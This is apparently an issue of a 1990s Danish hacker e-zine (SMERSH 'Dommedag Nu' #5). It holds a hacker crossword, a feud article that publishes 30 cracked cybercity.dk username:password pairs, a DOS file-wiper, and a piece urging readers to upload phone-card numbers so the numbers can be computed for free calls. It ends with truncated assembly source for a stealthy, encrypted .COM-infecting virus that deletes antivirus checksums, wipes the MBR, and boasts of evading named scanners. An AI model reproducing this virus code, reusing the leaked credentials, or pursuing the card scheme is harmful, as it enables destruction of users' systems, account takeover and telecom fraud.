 ؛   ³   ³ غ ³   ³   ³   ³ غ ³   ³   ³   ³ غ ³   ³   ³   ³   ³   ³   ³ غ ³ غ ؛
 4ؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤ26ؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤ36ؤؤإؤؤؤإؤؤؤإؤؤؤ¶
 ؛   ³   ³   ³   ³   ³   ³   ³ غ ³   ³   ³   ³   ³   ³ غ ³ غ ³   ³   ³   ³   ؛
 بحححدحححدحححدحححدحححدحححدحححدحححدحححدحححدحححدحححدحححدحححدحححدحححدحححدحححدححح¼

Horisontal:
1)  Hvilket UNIX utility er der fundet flest fejl i?
2)  Hvilket output device er sk‘rmen?
4)  Titlen p† en ny "hacker" film.
6)  Hvis hans ___ er 0, s† er han root (eller noget p† samme niveau).
8)  TCP/__.
10) En 3L!t3 gruppe (syntes de selv).
12) Han er kendt som "skoen".
14) Hvad er telnet port 79?
16) Hvem har lavet TREMOR og NEUROQUILA?
18) Hvad er telnet port 21?
20) Hvilket blad er lavet af TNO?
22) Hvilken enkrypterings-formel bruger SecureDrive blandt andet?
24) $___ /etc/passwd.
26) En virus der if›lge rygterne skulle v‘re lavet af John McAfee?
28) VLAD's Danske medlem.
30) En Ethernet_______.
32) Dark Avengers engine.
34) Et Svensk virus blad. ______ Reality.
36) Hvilket utility var f›r i tiden meget brugt, til at lave en "bagd›r"?
38) En ny hacker-film, The ___.

Vertikal:
1)  Et af de mest brugte password's.
3)  Hvilken shell s‘tter man ofte i forbindelse med rlogin?
5)  Hvad skal du bruge til Datapak?
7)  NETTET?
9)  Han har lavet COPS og SATAN. Han hedder Dan ______.
11) Hvad ligger p† 80010010?
13) Et program der ydnytter en fejl i NIS.
15) Hvilken "hacker"-film har Robert Redford v‘ret med i?
17) Hvad hedder den enkrypterings-metode som PGP benytter?
19) Han er en superhacker. Han hedder Kevin _______, ogs† kendt som Dark Dante.
21) Hvilken boks kan man lave ud af et Hallmark kort?
23) UNIX kommandoen ved Unix-til-Unix-kopiering.
25) Polymorphic engine af Rajaat.
27) ___, gruppen som blev beskyldt for at nedl‘gge AT&T.


             ‏S‏M‏E‏R‏S‏H‏‏D‏O‏M‏M‏E‏D‏A‏G‏‏N‏U‏‏#‏5‏‏S‏M‏E‏R‏S‏H‏


                     Janek - hvad gik der galt i dit liv?!
                            Af Clive Sharp og Leroy

        Historien starter med at, Janek i midten af December, kontakter Darkman
p† Darkside Connection og fort‘ller at han har "hacket" cybercity.dk, Darkman
fort‘ller ham s† p‘nt at bare fordi man har f†et fat i en /etc/passwd, s†
betyder det ikke at man er hacker, Janek giver dog udtryk for han ikke er helt
enig og bliver ved med at p†st† at han alts† er en hacker, for han kan nemlig
bruge en packet sniffer, men han l‘rer dog hurtigt at der findes visse danskere
som er i stand til at kode en packet sniffer [kan alle i SMERSH ikke det? -red]
og han fort‘ller at, han ogs† har "hacket" et par BBS'er, [BBS'erne er til
hackernes fordel, hvorfor "hacke" dem? -red] her f†r han dog at vide at,
det at f† fingerene i en USERS.BBS fra et bbs, absolut intet har med hacking at
g›re. Darkman og Clive Sharp (Clive Sharp var p† bes›g) var dog s† flinke og
overb‘rende at, hj‘lpe ham lidt p† vej, s† de r†dede ham til at l‘se nogle
UNIX, TCP/IP og ANSI C b›ger. Janek uploader s† /etc/passwd fra cybercity.dk
til Clive Sharp og beder ham om at f† Cracker Jack, [kun nybegyndere bruger
password crackers -red] hvilket han f†r, samtidige sp›rger Janek s† Darkman om
krypterings algoritmen som bliver brugt til at kryptere passwords med i UNIX,
Darkman pr›ver s† at forklare ham om hvad en envejs algoritme er og andet
lav-niveau krypterings teknologi, men dette var Janek ikke helt i stand til at
forst†r [det var sikkert Darkman's skyld eh? -red].

        Et par dage senere kontakter Janek igen Darkman, for at fort‘lle
Darkman, at han har cracket password'et p† 20 accounts, da Janek s† h›rer at
Clive Sharp for sjov har siddet og cracket lidt og har f†et 30 accounts,
sp›rger han om Clive Sharp har en Alpha/322, for Janek var ikke klar over at
man ikke beh›vede at taste password'sne ind, men at man kunne k›rer en wordlist
igennem. Darkman fort‘ller ham, at der nok vil bliver skrevet en artikel om ham
i det n‘ste nummer af Dommedag Nu, hvorefter Janek tigger om at den ikke bliver
skrevet. Janek var dog stadig interesseret i at l‘rer noget mere om hacking og
sp›rger derfor Darkman om man ikke kan lave en trojan/bagd›r, men ogs† denne
forklaring taber han interessen for, lige s† snart at Darkman er begyndt
[/bin/login backdoor ruxor -red].

        En m†ned senere bliver Darkman kontaktet af Mr. Nobody, som sp›rger ham
om han kender Janek og Cryptic Rider, hvorefter Darkman svarer: "nope", Mr.
Nobody uploader s† en fil, som er skrevet af de 2 ovenst†ende [HPA-CULT.ZIP
-red]. Filen indholdte telefonnummeret og 20 accounts til cybercity.dk og
telefonnummeret og 3 accounts til UNI-C. Grunden til at Mr. Nobody spurgte
Darkman og han kendte Janek, var at Janek og Cryptic Rider i filen havde
skrevet, at Darkman var en af de mennesker som de beundrede.

        Vi SMERSH synes at hele denne historie er meget skr‘mmende, fordi hvis
fremtidens hackere, bliver mennesker som fort‘ller alle at, de er hackere uden
at vide hvad det i virkeligheden drejer sig om og de g›r alt for at blive
"ber›mte", [Dixie? han er sku' mere i pressen end min k‘reste skifter trusser
-red] s† ser fremtiden for den danske scene meget sort ud. Det v‘rste er dog,
ved at udegive den fil offentligt, har de to ›delagt cybercity.dk gateway'en
for alle de andre danske hackere. Det synes vi i SMERSH er den v‘rste synd af
dem alle og derfor beder vi alle som har Janek og Cryptic Rider, som bruger p†
deres BBS, om at smide dem af.

        Eftersom at Janek og Cryptic Rider allerede har ›delagt cybercity.dk
gateway'en, er her de 30 accounts som Clive Sharp fandt, da han for sjov sad og
crackede:

nicolas:russell:1119:21:Nicolas Bennetzen:/usr/staff/nicolas:/bin/tcsh
michael:coitus:1131:21:Michael Nielsen:/usr/staff/michael:/bin/tcsh
torben:madsen:1132:21:Torben Madsen:/usr/staff/torben:/bin/tcsh
kursus1:kursus1:1901:20::/usr/CyberCity/users/kursus1:/bin/tcsh
kursus2:kursus2:1902:20::/usr/CyberCity/users/kursus2:/bin/tcsh
kursus3:kursus3:1903:20::/usr/CyberCity/users/kursus3:/bin/tcsh
kursus4:kursus4:1904:20::/usr/CyberCity/users/kursus4:/bin/tcsh
kursus5:kursus5:1905:20::/usr/CyberCity/users/kursus5:/bin/tcsh
kursus6:kursus6:1906:20::/usr/CyberCity/users/kursus6:/bin/tcsh
kursus7:kursus7:1907:20::/usr/CyberCity/users/kursus7:/bin/tcsh
kursus8:kursus8:1908:20::/usr/CyberCity/users/kursus8:/bin/tcsh
kursus9:kursus9:1909:20::/usr/CyberCity/users/kursus9:/bin/tcsh
kursus10:kursus10:1910:20::/usr/CyberCity/users/kursus10:/bin/tcsh
kursus11:kursus11:1911:20::/usr/CyberCity/users/kursus11:/bin/tcsh
kursus12:kursus12:1912:20::/usr/CyberCity/users/kursus12:/bin/tcsh
kursus13:kursus13:1913:20::/usr/CyberCity/users/kursus13:/bin/tcsh
kursus14:kursus14:1914:20::/usr/CyberCity/users/kursus14:/bin/tcsh
kursus15:kursus15:1915:20::/usr/CyberCity/users/kursus15:/bin/tcsh
kursus16:kursus16:1916:20::/usr/CyberCity/users/kursus16:/bin/tcsh
kursus17:kursus17:1917:20::/usr/CyberCity/users/kursus17:/bin/tcsh
kursus18:kursus18:1918:20::/usr/CyberCity/users/kursus18:/bin/tcsh
kursus19:kursus19:1919:20::/usr/CyberCity/users/kursus19:/bin/tcsh
kursus20:kursus20:1920:20::/usr/CyberCity/users/kursus20:/bin/tcsh
kursus21:kursus21:1921:20::/usr/CyberCity/users/kursus21:/bin/tcsh
kursus22:kursus22:1922:20::/usr/CyberCity/users/kursus22:/bin/tcsh
ccc2422:moon:2422:20::/usr/CyberCity/users/ccc2422:/bin/tcsh
ccc2618:mash4077:2618:20::/usr/CyberCity/users/ccc2618:/bin/tcsh
ccc2771:abracada:2771:20::/usr/CyberCity/users/ccc2771:/bin/tcsh
ccc4404:blackie:4404:20::/usr/CyberCity/users/ccc4404:/bin/tcsh
ccc6020:susanne:6020:20::/usr/CyberCity/users/ccc6020:/bin/tcsh


             ‏S‏M‏E‏R‏S‏H‏‏D‏O‏M‏M‏E‏D‏A‏G‏‏N‏U‏‏#‏5‏‏S‏M‏E‏R‏S‏H‏


                              G† V‘k Og Bliv Borte
               Af Darkman med dokumentation og ide af Clive Sharp

        Jeg (Clive) sad og l‘ste en artikel i Wired, der omhandlede firmaer der
levede af at fremskaffe informationer, der var blevet slettet. Det der blev
sagt var, at man blev n›d til at slette en fil 9 gange f›r den var fuldst‘ndigt
v‘k. Dette kom som en kraftig overraskelse for mig, da jeg troede, at det var
nok at overskrive data tre gange, for at fjerne informationerne ‚n gang for
alle. Men det var det ikke! Derfor blev jeg og Darkman enige om, at lave en
File-Wiper til alle jer.

        Ja ja, der er blevet laver file-wipe'ere f›r, men ikke som denne. Denne
File-Wiper, som officielt hedder DDNGVOBB, wiper automatisk en fil 10 gange,
bare for at v‘re p† den sikre side. Men man skal dog v‘re opm‘rksom p†, at
selvom man bruger dette fantastisk utility, s† sikre det ikke alt det, som tid-
ligere er blevet slettet p† den normale m†de. Vi vil p† et senere tidspunkt
lave en version, der kan wipe de frie sektore p† harddisken.

        Men hvordan bruger man s† DDNGVOBB? Ja, det er faktisk ganske nemt. For
at wipe en fil skriver man:

DDNGVOBB filnavn1.ext

        Hvis man vil wipe flere filer p† ‚n gang, skal man skrive:

DDNGVOBB filnavn1.ext filnavn2.ext filnavn3.ext ....

        Man kan desv‘rre IKKE bruge wildcards, men dette vil blive tilf›jet i
den n‘ste version.

        VIGTIGT! Man m† IKKE bruge disk-cache (WRITE), n†r man bruger DDNGVOBB,
da dette medf›re en kraftig sikkerhedsrisiko. For at se, om du har din WRITE-
cache sl†et til, s† skriv (hvis du bruger smartdrv): smartdrv og du vil f† de
informationer du skal bruge.


                         ---------- Klip her ----------
comment *
                                    DDNGVOBB
                                    Code by
                                 Darkman/SMERSH

To compile DDNGVOBB with Turbo Assembler v 4.0 type:
  TASM DDNGVOBB.ASM
  TLINK /t DDNGVOBB.OBJ
*

.model tiny
.code
 org   100h                              ; Origin of DDNGVOBB

code:
             cld                         ; Clear direction flag

             mov     ah,09h              ; Standard output string
             lea     dx,message          ; DX = offset of message
             int     21h                 ; Do it!

             mov     si,81h              ; SI = offset of command tail
             push    si                  ; Save SI at stack
conv_param:
             mov     di,si
             lodsb                       ; Load a byte of command tail

             cmp     al,0dh              ; End of command tail?
             je      move_enter          ; Equal? Jump to move_enter
             cmp     al,20h              ; End of filename?
             jne     conv_param          ; Not equal? Jump to conv_param

             xor     al,al               ; Zero AL
             stosb                       ; Zero a byte of command tail

             jmp     conv_param
move_enter:
             mov     ax,0d00h
             stosw                       ; Move the end of the command tail

             pop     si                  ; Load SI from stack
find_param:
             lodsw                       ; Load a word of command tail
             dec     si                  ; Decrease SI

             or      ah,ah               ; Beginning of filename
             je      find_param          ; Equal? Jump to find_param
             cmp     ah,0dh              ; End of command tail
             je      exit                ; Equal? Jump to exit
             or      al,al               ; Beginning of filename
             jne     find_param          ; Not Equal? Jump to find_param
             
             mov     ax,4301h            ; Set file attributes
             xor     cx,cx               ; Zero CX
             mov     dx,si               ; DX = offset of filename
             int     21h                 ; Do it!
             jc      get_message         ; Error? Jump to get_message

             mov     cl,0ah              ; Overwrite file 10 times
next_pass:
             push    cx                  ; Save CX at stack

             mov     ax,3d01h            ; Open file (write)
             mov     dx,si               ; DX = offset of filename
             int     21h                 ; Do it!
             jc      get_message         ; Error? Jump to get_message
             xchg    ax,bx               ; Exchange AX with BX
keep_wiping:
             mov     ax,4201h            ; Move file pointer current position
             cwd                         ; Zero DX
             mov     cx,dx               ; Zero CX
             int     21h                 ; Do it!
             push    dx ax               ; Save registers at stack

             mov     ax,4202h            ; Move file pointer to end of file
             cwd                         ; Zero DX
             int     21h                 ; Do it!
             mov     bp,dx
             mov     di,ax

             mov     ax,4200h            ; Move file pointer from beginning
             pop     dx cx               ; Load registers from stack
             int     21h                 ; Do it!

             sub     di,ax               ; Calculate what's left to be wiped
             sbb     bp,dx               ;     "       "     "   "  "    "

             mov     cx,0ffffh           ; Write 64 Kb

             or      bp,bp               ; Don't write 64 Kb?
             jnz     write_file          ; Not zero? Jump to write_file

             mov     cx,di
write_file:
             mov     ah,40h              ; Write file
             cwd                         ; Zero DX
             int     21h                 ; Do it!

             or      bp,bp               ; Pass finished?
             jnz     keep_wiping         ; Not zero? Jump to keep_wiping

             mov     ah,3eh              ; Close file
             int     21h                 ; Do it!

             pop     cx                  ; Load CX from stack
             loop    next_pass

             mov     ah,41h              ; Delete file
             mov     dx,si               ; DX = offset of filename
             int     21h                 ; Do it!

             lea     dx,successful       ; DX = offset of successful

             jmp     stdout_str
get_message:
             cmp     ax,02h              ; File not found?
             lea     dx,filenotfound     ; DX = offset of filenotfound
             je      stdout_str          ; Equal? Jump to stdout_str

             cmp     ax,03h              ; Path not found?
             lea     dx,pathnotfound     ; DX = offset of pathnotfound
             je      stdout_str          ; Equal? Jump to stdout_str

             cmp     ax,05h              ; Access denied?
             lea     dx,accessdenied     ; DX = offset of accessdenied
stdout_str:
             mov     ah,09h              ; Standard output string
             int     21h                 ; Do it!

             jmp     find_param
exit:
             cmp     dx,offset message   ; DX = offset of message?
             jne     restore_dta         ; Not equal? Jump to restore_dta

             mov     ah,09h              ; Standard output string
             lea     dx,param_error      ; DX = offset of param_error
             int     21h                 ; Do it!
restore_dta:
             int     20h                 ; Exit to DOS!

message      db      'DDNGVOBB v 1.00                                              By Darkman/SMERSH',0dh,0ah
             db      '=== <<< Dommedag Nu-File Wipe >>> =============================== 23-11-95 ===',0dh,0ah
             db      'Usage: DDNGVOBB [files]',0dh,0ah
             db      '------------------------------------------------------------------------------',0dh,0ah,0dh,0ah,'$'
param_error  db      'No parameters...',0dh,0ah,'$'
filenotfound db      'File not found...',0dh,0ah,'$'
pathnotfound db      'Path not found...',0dh,0ah,'$'
accessdenied db      'Access denied...',0dh,0ah,'$'
successful   db      'File successfully wiped...',0dh,0ah,'$'

end          code
                         ---------- Klip her ----------


             ‏S‏M‏E‏R‏S‏H‏‏D‏O‏M‏M‏E‏D‏A‏G‏‏N‏U‏‏#‏5‏‏S‏M‏E‏R‏S‏H‏


                            Danmark Direkte Telekort
                                 Af Clive Sharp

        Her for nyligt faldt jeg over et Tele Danmark kort, som jeg ikke har
set f›r. Kortet hedder Danmark Direkte Telekort, og kan bruges til at ringe FRA
udlandet TIL Danmark. Du kan IKKE ringe fra Danmark til udlandet, og du kan
ikke ringe til andre lande end til Danmark (fra udlandet).

        Forsiden af kortet.
        Forsiden af Danmark Direkte kortet (som er i den normale kreditkort
st›rrelse), ligner ikke et normalt Tele Danmark Telekort. P† det eksemplar som
jeg har, er der et billede af en mand, der sidder i badebukser p† nogle klipper
ved vandet. Forneden st†r der med hvidt: TELEKORT. Til h›jre er der et Tele
Danmark logo, som st†r p† h›jkant. Ovenover det st†r der: 80 Kroner. Ovenover
det st†r der Danmark Direkte, og der er et stort D, der er fyldt ud med et
Dansk flag.

        Bagsiden af kortet (direkte afskrift f›lger).
        [ Danmark Direkte Telekort
          Med Danmark Direkte Telekort kan du ringe hjem til Danmark alle d›g-
          nets 24 timer fra alle slags telefoner.

          F›lg vedlagte vejledning! Bem‘rk, at ved korttelefoner o.l. skal kor-
          tet IKKE indstikkes i automaten eller f›res gennem kortl‘ser.

          Yderligere information om brug af Danmarks Direkte Telekort kan f†s
          hos TelefonService Udland, servicenummer 141.

          Tele Danmark

          Udl›bsdato: 21.02.96          Litra: AB          L›benr: 57862447
          KORTNUMMER: 995 845 0598
          Restv‘rdi refunderes efter udl›bsdato i indtil 6 m†neder. ]

        Bem‘rk, at der IKKE er nogen magnetstribe p† kortet, ligesom der heller
ikke er nogen chip (Danm›nt stil). Det eneste man skal bruge er det kortnummer,
som der st†r p† kortet. Og der er INGEN hemmelige pin-koder. Grunden til dette
kraftige frav‘r af sikkerhed er nok, at Tele Danmark ikke er s† bange for fusk,
da man ikke kan ringe fra Danmark, men kun til Danmark.

        Sammen med kortet f†r man en l‘kker lille vejledning. Og som f›r s†
kommer der her en direkte afskrift (af noget af den):

        [ 1) V‘lg Danmark Direkte-nummeret for det land, hvori du befinder dig.
             Se nedest†ende liste. Afvent forbindelse med det automatiske sys-
             tem.

          2) Tast eller indtal "1" for valg af "automatisk kortsamtale".

          3) Tast/indtal kortnummer (starter med 99).

          4) Tast/indtal det Danske telefonnummer. F›r du f†r forbindelse med
             nummeret, f†r du oplysning om, hvor lang samtaletid, du har til-
             bage p† kortet.

          BEM’RK! Efter indtaling af et ciffer indikerer eet "bip", at infor-
          mationen er opfattet - to "bip" betyder, at cifferet skal gentages.

          Alaska                1800 762 0045           (20,00)
          Australien             1800 881 450           (13,00)
          Bahrain                     80 0045           (20,00)
          Belgien                 0800 1 0045            (4,00)
          Brasilien                  0008 045           (20,00)
          Canada                1800 363 4045               *6*
          Chile *3* *4*               000 345           (20,00)
          Costa Rica                      175           (20,00)
          Cypern                    0809 0045            (6,00)
          Filippinerne *3*             105 45           (20,00)
          Finland                 9800 1 0450        (3,00 *2*)
          Frankrig:
           - privattelefon        19 *1* 0045            (4,00)
           - m›nttelefon          19 *1* 0045        (4,00 *5*)
           - korttelefon              19 0045            (4,00)
          New Zealand                 000 945       (20,00 *5*)
          Norge                     8001 9945            (3,00)
          Polen *3*                0045 01010        (4,00 *5*)
          Portugal                  0505 0045            (4,50)
          Puerto Rico           1800 762 0045           (20,00)
          Schweiz                    155 1145            (4,75)
          Singapore              8000 45 0450           (16,00)
          Slovakiet *3*          0042 0045 01            (4,00)
          Spanien                 900 99 0045            (6,00)
          Storbritannien:
           - BT-telefoner        0800 89 0045        (4,00 *5*)
           - MCI-telefoner       0500 89 0045            (4,00)
          Sverige                 020 799 045        (3,00 *5*)
          Gr‘kenland *3*          008 0045 11        (4,50 *5*)
          Holland             06 *1* 022 0045            (4,00)
          Hong Kong                  800 0045       (16,00 *5*)
          Indonesien *3*           001 801 45           (20,00)
          Irland                 1800 55 0045            (4,00)
          Island                      999 045        (6,00 *2*)
          Israel                 177 450 2727       (13,00 *5*)
          Italien *3*                172 0045        (4,50 *5*)
          Japan                      0039 451           (16,00)
          Jomfru›erne (AM)      1800 762 0045           (20,00)
          Litauen                   8 *1* 198            (6,00)
          Luxembourg                0800 0045            (4,00)
          Malaysia *3*               800 0045       (20,00 *5*)
          Marokko *3*             002 11 0045            (8,00)
          Sydafrika *3*          0800 99 0045       (20,00 *5*)
          Sydkorea                   009 0450           (20,00)
          Taiwan                 0800 45 0045           (20,00)
          Thailand *4*        001 999 45 1000           (20,00)
          Tjekkiet *3*           0042 0045 01            (4,00)
          Tyrkiet *3*       008 *1* 0045 1177            (6,00)
          Tyskland *3*           0130 80 0045        (4,50 *5*)
          Ungarn             00 *1* 800 04511            (4,00)
          USA:
           - AT&T-telefoner     1800 762 0045               *6*
           - MCI-telefoner      1800 888 3263               *6*
           - Sprint-telefoner   1800 659 0098               *6*
          ‌strig                  022 903 045        (4,00 *2*)

          *1* Afvent eventuelt ny klartone f›r ›vrige cifre v‘lges.
          *2* Under samtalen betales ogs† lokaltakst p† stedet.
          *3* Opkald ikke muligt fra hele landet.
          *4* Opkald ikke muligt fra m›nttelefoner.
          *5* Fra m›nt/korttelefoner betales startafgift (retuneres nogle
              steder efter samtalen).
          *6* Canada/USA - minutafgift:
              Mandag-fredag kl. 8-23 Dansk tid 10,00 dkr.
              ‌vrige tidspunkter 8,00 dkr.

        Systemet som dette k›re p†, er et voice response system, i stil med
AT&T. Det vil sige, at du b†de kan taste og "tale" dig igennem, UDEN at skulle
snakke med en operat›r.

        Hvad kan jeg bruge det til, sp›rger du sikkert. Tjaaa, du kunne jo give
det til nogle af dine udenlandske venner, s† de kan ringe gratis til dig. Det
er ogs† godt, hvis du vil have access til et udenlandsk H/P/A/V/C bbs, og hvis
du ikke har de h†rde k0d3Z, s† kan det godt blive sv‘rt. Men hvis du s† l‘gger
nogle af disse Danmark Direkte kort, s† f†r du temmeligt sikkert access.

        Nu mangler vi bare at finde en m†de at udregne disse kort p†, da det
er n‘sten 100% sikkert, at man kan udregne dem. Til det skal vi bare bruge en
masse kort. Desv‘rre er det ikke lige de kort, som man finder flest af p† gaden
s† hvis i finder nogle af disse kort, s† smid lige nummeret op p† Darkside Con-
nection, og s† skal vi nok arbejde p† at f† det fikset! [Der er bonus DL til
dem der upper kortnumre -red]. Bem‘rk at kortnummeret er ‘ndret.


             ‏S‏M‏E‏R‏S‏H‏‏D‏O‏M‏M‏E‏D‏A‏G‏‏N‏U‏‏#‏5‏‏S‏M‏E‏R‏S‏H‏


                            Yitzhak-Rabin - en virus
                      Af TorNado med forord af Clive Sharp

        Ja, og igen har vi en virus fra vores ven TorNado. TorNado har v‘ret s†
flink selv at beskrive sin virus, s† det slipper vi for at g›re. Det kan siges
at den har rimelig mange interessante funktioner, dog kunne den godt optimeres
mere, men det er han klar over.

;*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*
;
;                           Yitzhak-Rabin
;                                by
;                           T o r N a d o
;                               
;   Description:
;   ------------
;   -- Parasitic resident .COM infector
;   -- Semi stealth ( 11h/12h and 4eh/4fh )
;   -- Int24 ( Critical Error Handler )
;   -- Intercept Int9 ( Ctrl-Alt-Del -> writes logo into sector )
;   -- Intercept Int26 DOS absolut disk write ( MBR wiped the 3rd! )
;   -- XOR encryption
;   -- Delete Tbav CRC checksums ( in current DIR )
;   -- Saves original Time / Date
;   -- Infect COMMAND.COM
;
;   Antivirus:
;   ----------
;   -- No FLAGS on hard heuristic with TBAV650
;   -- No detection with heuristic by F-PROT v. 2.21
;   -- No detections at all by AVP v. 2.1
;   -- No detection at all by Mcafee v. 2.2.0
;   -- No detection at all by Toolkit v. 7.0
;
;   To Compile:
;   -----------
;   Tasm rabin.asm
;   Tlink rabin.obj
;   Exe2bin rabin.exe rabin.com
;
;*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#**#*#*#*#*#*#*#*#*#*#*#*#*#*#**#*#*#*#*#**#*#*#*

yitzhak_rabin   segment
		assume  cs:yitzhak_rabin,ds:yitzhak_rabin,es:yitzhak_rabin
		org     00h

start:          call    fooldeltaoff

deltaOFF:       int     03h

		call    xor_crypt
		jmp     short installation

encrypt_start:

jmp_error:      jmp     error_resident

installation:   mov     ax,8863h                      ; rabin service
		int     21h
		
		cmp     bx,'YR'                       ; DX returned in bx?
		je      jmp_error                     ; YR = assume resident

cut_memory:     mov     ah,4ah                        ; find top of memory
		mov     bx,0ffffh                     ; (65536)
		int     21h                          

		sub     bx,(codeend-start+15)/16+1    ; resize enough para's
		mov     ah,4ah                        ; for virus
		int     21h

		mov     ah,48h                        ; allocate for virus
		mov     bx,(codeend-start+15)/16
		int     21h
		jc      jmp_error

		dec     ax                            ; ax - 1 = mcb
	
		mov     es,ax
		mov     byte ptr es:[0],'Z'
		mov     word ptr es:[1],8             ; dos = mcb owner
		inc     ax

		cld                                
		lea     si,[bp+offset start]          ; vir start
		mov     es,ax
		xor     di,di
		mov     cx,(codeend-start+4)/2        ; vir length
		rep     movsw     

; get DOS time and decide if we are gonna hook int9 or int26 

		mov     ah,2ch  ; get DOS time 
		int     21h

		cmp     cl,10   ; is min below or = 10 
		jbe     hook_int09h ; if so hook int9

		cmp     cl,55   ; is min greather or = 55
		jge     hook_int26h ; if so hook int26

hook_int26h:    xor     ax,ax
		mov     ds,ax
		push    ds

		lds     ax,ds:[26h*4]
		mov     word ptr es:[oldint26h],ax
		mov     word ptr es:[oldint26h+2],ds
		pop     ds
		mov     word ptr ds:[26h*4],offset virusint26
		
		mov     bx,es
		mov     ds:[26h*4+2],bx

		jmp     short hook_int21h

hook_int09h:    xor     ax,ax
		mov     ds,ax
		push    ds
						 
		lds     ax,ds:[9h*4]
		mov     word ptr es:[oldint09h],ax
		mov     word ptr es:[oldint09h+2],ds
		pop     ds
		mov     word ptr ds:[9h*4],offset virusint9
		
		mov     bx,es
		mov     ds:[9h*4+2],bx

hook_int21h:    xor     ax,ax
		mov     ds,ax
		push    ds

		lds     ax,ds:[21h*4]
		mov     word ptr es:[oldint21h],ax  
		mov     word ptr es:[oldint21h+2],ds
		pop     ds
		mov     word ptr ds:[21h*4],offset virusint21
		
		mov     bx,es                            
		mov     ds:[21h*4+2],bx                  

		push    cs                              
		pop     ds                                                      
						   
error_resident: push    cs                                               
		pop     es                               
		
		mov     di,100h                       
		mov     cx,4                                                  
		lea     si,[bp+offset orgbuf]     ; fix correct offset (delta)
		repne   movsb                            

		mov     ax,101h  
		dec     ax                        ; entry point
		jmp     ax                                    

virusint21      proc    near

		cmp     ax,4b00h               ; Execute
		je      jmpinfect
		
		cmp     ax,4301h               ; Set attributes
		je      jmpinfect
		
		cmp     ah,11h                 ; FCB findfirst
		je      FCB_stealth

		cmp     ah,12h                 ; FCB findnext 
		je      FCB_stealth

		cmp     ah,4eh                 ; DTA findfirst 
		je      DTA_stealth

		cmp     ah,4fh                 ; DTA findnext 
		je      DTA_stealth

		cmp     ax,8863h               ; Check if resident
		jne     function21             
		mov     bx,'YR'
		iret

virusint21      endp

function21      proc    near
		jmp     dword ptr cs:[oldint21h]
		ret         
function21      endp                            

jmpinfect:      jmp     infect
		    
FCB_stealth:    pushf
		push    cs
		call    function21
		or      al,al                    ;was the dir call sucessfull??
		jnz     skip_dir                 ;if not skip it

		push    ax bx es                

		mov     ah,51h                   ; get current PSP to es:bx
		int     21h
		mov     es,bx
		cmp     bx,es:[16h]              ;is the PSP ok??
		jnz     error_1

		mov     bx,dx
		mov     al,[bx]                  ;al holds current drive
		push    ax                       ;extended FCB
		mov     ah,2fh                   ;get DTA-area
		int     21h
		pop     ax
		inc     al                       
		jnz     no_ext
		add     bx,7                      

no_ext:         mov     al,byte ptr es:[bx+17h]   ;get seconds field
		and     al,1fh
		xor     al,01h                    ;is the file infected??
		jnz     error_1                   ;if not don't hide size

hide_it:        sub     word ptr es:[bx+1dh],(codeend-start) ;else sub vir_size

error_1:        pop     es bx ax 
skip_dir:       retf    2        

DTA_stealth:    pushf                                        
		push    cs                         
		call    function21
		jc      no_files                 

		pushf
		push    ax di es bx                              

		mov     ah,2fh                          
		int     21h

		mov     di,bx
		add     di,1eh
		cld
		mov     cx,9            ; scan for the '.' 
		mov     al,'.'          
		repne   scasb                         
		jne     not_inf         ; file without any ext.

		cmp     word ptr es:[di],'OC'           
		jne     not_inf                   

		cmp     byte ptr es:[di+2],'M'          
		jne     not_inf                    

		mov     ax,es:[bx+16h]                  
		and     al,1fh
		xor     al,01h                          
		jnz     not_inf                  

                cmp     word ptr es:[bx+1ah],(codeend-start) ;dont stealth too
                ja      hide                                 ;small files

hide:           sub     es:[bx+1ah],(codeend-start)  ; hide file size

not_inf:        pop     bx es di ax
		popf
no_files:       retf 2                               

virusint24      proc    near
		mov     al,03h
		iret           
virusint24      endp

jmpexit_virus:  jmp     exit_virus

infect:         push    ax bx bp cx dx di si ds es

open_file:      push    ds
		push    dx
		mov     ax,3524h
		int     21h
		mov     word ptr cs:[save_int24],bx
		mov     word ptr cs:[save_int24+2],es
						
		push    cs
		pop     ds
		mov     dx,offset virusint24
		mov     ax,2524h
		int     21h

		pop     dx
		pop     ds 
		
		mov     ax,3d02h           ; open file with read/write axs
		int     21h             
		push    ax
		jc      jmpexit_virus      ; if error jump out
		pop     ax
	
		xchg    ax,bx           
	
		mov     ax,5700h
		int     21h

		mov     cs:[save_time],cx
		mov     cs:[save_date],dx
		
		push    ds                              
		push    cs                              
		pop     ds                              
		push    cs
		pop     es

		mov     ah,3fh                    ; read first four bytes
		mov     dx,offset orgbuf          ; to orgbuf
		mov     cx,4                            
		int     21h                             

		cmp     byte ptr cs:[orgbuf],'M'   ; check 1 byte
		je      close_file

		cmp     byte ptr cs:[orgbuf+3],'R' ; already infected?
		je      jmpexit_virus

		call    delete_crc

move_pointer:   mov     ax,4202h
		call    file_pointer

		mov     bp,ax
		sub     ax,3                                     
		mov     word ptr cs:[newbuf+1],ax  

                mov     ah,2ch                      ;get random number from
                int     21h                         ;time
		mov     word ptr ds:[encrypt_val],dx    ;store it
		mov     ax,08d00h
		mov     es,ax
		mov     di,00h
		mov     si,di
		mov     cx,(codeend-start+1)/2
		rep     movsw
		push    es
		pop     ds
		xor     bp,bp

		call    xor_crypt                   ;and encrypt

		mov     ah,40h                      ;write it to file
		mov     cx,codeend-start
		mov     dx,offset start
		int     21h

		mov     ax,4200h
		call    file_pointer

		mov     ah,40h                       ; write new jump
		mov     cx,4                               
		mov     dx,offset newbuf             
		int     21h

close_file:
stealth_marker: mov     ax,5701h
		mov     dx,cs:[save_date]
		mov     cx,cs:[save_time]
		and     cl,0e0h                     ; stealth marker
		inc     cl                          
		int     21h                         
		
		mov     ah,3eh                      ; close file
		int     21h
		
		push    ds
		pop     ds
		mov     ds,cs:[save_int24+2]
		mov     dx,cs:[save_int24]
		mov     ax,2524h
		int     21h                     ; restore the int 24h

exit_virus:     pop     ds es ds si di dx cx bp bx ax
		jmp     function21 

file_pointer:   cwd
		xor     cx,cx
		int     21h
		ret

;***************************** INT 9h ****************************************
virusint9       proc    near                   ; If key pressed this
		push    ax                     ; routine is called
		in      al,60h                 ; has an ctrl-alt-del
		cmp     al,ctrl_alt_del        ; been made?
		je      warm_reboot

function9:      pop     ax
		jmp     dword ptr cs:[oldint09h]  ; leave system alone
		iret

